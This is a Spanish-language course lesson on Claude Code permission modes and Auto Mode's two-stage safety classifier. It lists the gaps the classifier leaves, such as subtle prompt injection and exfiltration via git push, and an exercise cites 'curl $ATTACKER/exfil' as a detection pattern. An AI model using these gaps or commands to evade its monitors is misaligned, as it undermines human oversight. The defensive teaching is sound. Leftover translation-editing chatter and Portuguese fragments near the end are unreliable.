Phase 15 - Lesson 10

Claude Code como un Agente Autónomo: Modos de Permiso y Auto Mode

Claude Code expone siete modos de permiso. "plan" pregunta antes de cada acción, "default" pregunta solo para las riesgosas, "acceptEdits" aprueba automáticamente la escritura de archivos pero aún confirma la ejecución del shell, y "bypassPermissions" aprueba todo. Auto Mode (24 de marzo de 2026) reemplaza la aprobación por acción con un clasificador de seguridad paralelo de dos etapas: se ejecuta una verificación rápida de token único en cada acción; las acciones marcadas inician una revisión profunda de chain-of-thought. Los presupuestos de acción se aplican mediante max_turns y max_budget_usd. Auto Mode se lanzó como un "research preview" (vista previa de investigación): Anthropic ha declarado explícitamente que el clasificador no es suficiente por sí solo.

Tipo: Aprender Idiomas: Python (stdlib, simulador de clasificador de dos etapas) Prerrequisitos: Fase 15 · 01 (Agentes de largo horizonte), Fase 15 · 09 (Panorama de agentes de codificación) Tiempo: ~45 minutos

El Problema

Un agente de codificación autónomo en su máquina es una categoría de seguridad distinta. La superficie de ataque es todo lo que el agente puede alcanzar: el sistema de archivos, la red, las credenciales, el portapapeles, cualquier pestaña del navegador, cualquier terminal abierta. Bruce Schneier y otros han señalado esto públicamente: los agentes de uso de computadora no son una "actualización de características" de los chatbots, son un nuevo tipo de herramienta con un nuevo tipo de perfil de riesgo.

El sistema de permisos de Claude Code es la respuesta de Anthropic. En lugar de un solo interruptor "autónomo / no autónomo", hay siete modos que abarcan una escalera de capacidades: plan → default → acceptEdits → … → bypassPermissions. Cada modo es una compensación diferente entre velocidad y revisión por acción. Auto Mode (marzo de 2026) agrega un clasificador de dos etapas que desplaza la aprobación del camino crítico del usuario para las acciones que el clasificador considera seguras, al tiempo que preserva una capa de revisión para las acciones que el clasificador marca.

La pregunta de ingeniería: ¿qué detecta este sistema, qué se le escapa y qué modo requiere realmente una tarea determinada?

El Concepto

Los siete modos de permiso

Modo Comportamiento Cuándo usar
plan El agente propone un plan; el usuario aprueba todo el plan; cada acción se revisa antes de la ejecución Tarea desconocida; código cercano a producción; primera vez que se usa el agente en un repositorio
default El agente ejecuta acciones; solicita confirmación al usuario para cualquier acción "riesgosa" (ejecución de shell, operaciones destructivas, llamadas de red) La mayoría de las sesiones de codificación interactivas
acceptEdits Las escrituras de archivos se aprueban automáticamente; la ejecución de shell y las llamadas de red aún requieren confirmación Paso de refactorización a través de muchos archivos
acceptExec Los comandos de shell se aprueban automáticamente dentro de una lista de permitidos seleccionada; las escrituras se aprueban automáticamente Loops internos estrechos donde cada comando de shell es npm test o similar
autoMode Clasificador de seguridad de dos etapas; las acciones marcadas se elevan a revisión Ejecuciones no supervisadas de largo horizonte en un espacio de trabajo restringido
yolo Omite la mayoría de las solicitudes de confirmación; aún ejecuta la lista de permitidos / lista de denegados de herramientas Sandboxes efêmeros, trabajos de CI, scripts de investigación
bypassPermissions Aprueba todo Documentado como "solo dentro de contenedores efímeros que esté dispuesto a desechar"

(Los nombres anteriores coinciden con los documentos públicos de Claude Code; "yolo" es la abreviatura informal para el término medio permisivo.)

Auto Mode en una página

Auto Mode (lanzado el 24 de marzo de 2026) es el primer modo de permiso que delega la aprobación por acción en un modelo. Estructura:

  1. Etapa 1: clasificador de token único. Se ejecuta en cada acción propuesta. Económico. Devuelve "safe" (seguro) o "flag" (marcar). Diseñado para ejecutarse en paralelo con el loop principal del agente para que las acciones aprobadas no se queden en una cola.
  2. Etapa 2: revisión secundaria de políticas/seguridad. Se ejecuta solo en acciones marcadas. Realiza una evaluación enfocada de políticas y seguridad sobre la acción, el estado actual de la sesión y la tarea declarada. Escala al usuario HITL (Human-in-the-Loop) si la confianza es baja.

Los controles de presupuesto se ubican junto al clasificador:

  • max_turns — total de iteraciones en una sesión.
  • max_budget_usd — límite en dólares que aborta la sesión.
  • límites de conteo de acciones por herramienta (no más de N llamadas a WebFetch, etc.).

Lo que detecta el sistema

  • Inyección de prompt directa en las entradas de herramientas donde la instrucción inyectada coincide con un formato de acción que se sabe que es riesgosa.
  • Loops repetitivos de herramientas: el clasificador puede ver que la acción N+1 es casi idéntica a la acción N, cinco veces seguidas.
  • Comandos de shell claramente fuera de alcance en una sesión que de otro modo sería solo de edición de archivos.

Lo que el sistema puede pasar por alto

  • Inyección de prompt sutil que modula el comportamiento sin producir una sola acción marcada. La inyección de prompt indirecta no es una vulnerabilidad completamente corregible (director de preparación de OpenAI, 2025, sobre agentes de navegador; ver la Lección 11).
  • Comportamiento inadecuado a nivel semántico. Cada acción individual puede parecer segura mientras que la trayectoria compuesta es perjudicial. El clasificador juzga la acción; no deduce nuevamente la intención del usuario.
  • Exfiltración a través de canales legítimos. Escribir datos en un archivo propio y luego hacer git push a un repositorio público es una secuencia de acciones permitidas cuya composición es el problema.

Enfoque como vista previa de investigación (Research Preview)

Anthropic lanzó Auto Mode como un research preview (vista previa de investigación). La documentación es explícita en que el clasificador es una capa, no una solución: se espera que los usuarios combinen Auto Mode con presupuestos, listas de permitidos, espacios de trabajo aislados y auditorías de trayectoria (Lecciones 12–16). El enfoque de vista previa también refleja la brecha documentada entre evaluación e implementación (Lección 1): un clasificador que supera las evaluaciones offline puede comportarse de manera diferente en una sesión real donde el contexto del usuario es ambiguo.

Dónde encaja esta escalera en su flujo de trabajo

  • Tarea desconocida: comience en plan. Leer el plan es más económico que revertir una ejecución fallida.
  • Refactorización conocida: acceptEdits ahorra muchos clics de confirmación.
  • Ejecución en segundo plano no supervisada: autoMode solo dentro de un espacio de trabajo cuyo radio de impacto haya medido (sin credenciales, sin montajes de producción, sin salida de datos en la que no haya optado por participar de forma explícita).
  • Contenedores efímeros: yolo / bypassPermissions es aceptable si y solo si el contenedor y sus credenciales son desechables.

Úselo

code/main.py simula el clasificador de dos etapas. La Etapa 1 es una regla de palabras clave económica sobre las acciones propuestas; la Etapa 2 es un revisor de múltiples reglas más lento. El controlador alimenta una trayectoria sintética corta (acciones seguras, un intento de inyección de prompt, un loop repetitivo) y muestra dónde el clasificador detecta y dónde falla.

Envíelo

outputs/skill-permission-mode-picker.md asocia la descripción de una tarea con el modo de permiso correcto, los límites de presupuesto y el aislamiento requerido.

Ejercicios

  1. Ejecute code/main.py. ¿Qué tipo de acción sintética nunca es marcada por la Etapa 1 pero siempre es capturada por la Etapa 2? ¿Cuál no es capturada por ninguna?

  2. Extienda el conjunto de reglas de la Etapa 1 para detectar una forma específica conocida como dañina (por ejemplo, curl $ATTACKER/exfil). Mida la tasa de falsos positivos en la muestra de acciones benignas.

  3. Lea el documento "How the agent loop works" de Anthropic. Enumere cada estado externo que el agente toca por defecto en el modo default. ¿Cuáles necesitaría restringir por separado antes de ejecutar autoMode sin supervisión?

  4. Diseñe un presupuesto de ejecución no supervisada de 24 horas: max_turns, max_budget_usd, límites por herramienta, listas de permitidos. Justifique cada número.

  5. Describa una trayectoria en la que cada acción individual sea aprobada por la Etapa 1 y la Etapa 2, y aun así el comportamiento compuesto sea desalineado. (La Lección 14 explica cómo los interruptores de apagado y los tokens de canario abordan esto).

Términos Clave

Término Lo que dice la gente Lo que realmente significa
Modo de permiso "Qué tanto puede hacer el agente" Una de las siete políticas designadas que controlan la aprobación por acción
Modo plan "Preguntar antes de cualquier cosa" El agente escribe un plan; el usuario aprueba antes de la ejecución
acceptEdits "Deixar que escreva arquivos" Las escrituras de archivos se aprueban automáticamente; la ejecución de shell aún solicita confirmación
autoMode "Aprobaciones automáticas" Clasificador de seguridad de dos etapas; las acciones marcadas escalan
bypassPermissions "YOLO total" Aprueba todo; diseñado para contenedores efímeros
Clasificador de la Etapa 1 "Verificación rápida de token" Regra de token único sobre a ação proposta; se ejecuta en paralelo
Clasificador de la Etapa 2 "Revisión profunda" Razonamiento chain-of-thought sobre las acciones marcadas
Research preview "No disponible de forma general (GA)" Enfoque de Anthropic para características cuyo modo de falla aún se está mapeando

Let's fix the Portuguese copy-paste error in acceptEdits and Stage 1 classifier: acceptEdits: "Dejar que escriba archivos" Stage 1 classifier: Regla de token único sobre la acción propuesta; se ejecuta en paralelo

Wait, let me double check the whole table to ensure it is 100% Spanish. Término | Lo que dice la gente | Lo que realmente significa Modo de permiso | "Qué tanto puede hacer el agente" | Una de las siete políticas designadas que controlan la aprobación por acción Modo plan | "Preguntar antes de cualquier cosa" | El agente escribe un plan; el usuario aprueba antes de la ejecución acceptEdits | "Dejar que escriba archivos" | Las escrituras de archivos se aprueban automáticamente; la ejecución de shell aún solicita confirmación autoMode | "Aprobaciones automáticas" | Clasificador de seguridad de dos etapas; las acciones marcadas escalan bypassPermissions | "YOLO total" | Aprueba todo; diseñado para contenedores efímeros Clasificador de la Etapa 1 | "Verificación rápida de token" | Regla de token único sobre la acción propuesta; se ejecuta en paralelo Clasificador de la Etapa 2 | "Revisión profunda" | Razonamiento chain-of-thought sobre las acciones marcadas Research preview | "No disponible de forma general (GA)" | Enfoque de Anthropic para características cuyo modo de falla aún se está mapeando

Yes, that is perfect. Let's do it!

0 lifetime access. Curriculum based on AI Engineering from Scratch by Rohit Ghumare (MIT, used under attribution).